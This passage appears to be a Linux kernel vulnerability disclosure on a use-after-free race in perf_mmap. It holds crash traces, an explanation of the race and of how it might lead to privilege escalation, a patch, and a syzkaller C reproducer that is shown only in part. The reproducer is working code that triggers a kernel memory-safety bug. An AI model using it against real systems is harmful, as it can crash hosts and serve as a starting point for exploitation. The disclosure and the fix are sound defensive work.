RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000
RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640
</TASK>
---[ end trace 0000000000000000 ]---
EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
EXT4-fs (loop0): Total free blocks count 0
EXT4-fs (loop0): Free/Dirty block details
EXT4-fs (loop0): free_blocks=12386304
EXT4-fs (loop0): dirty_blocks=16387
EXT4-fs (loop0): Block reservation details
EXT4-fs (loop0): i_reserved_data_blocks=16387
EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28
EXT4-fs (loop0): This should not happen!! Data will be lost
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
SYZFAIL: failed to recv rpc
fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor)
<<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>>
Reproduce
----------
The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown.
The reproducer follows this execution flow:
1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer.
2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor.
3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer.
4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window.
5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report.
Security impact
---------------
The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible.
Patch
--------------
From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001
From: 0ne1r0s <yuhaocheng035@gmail.com>
Date: Sat, 31 Jan 2026 21:16:52 +0800
Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
Request
-------
Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID.
Best regards,
Haocheng Yu
Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
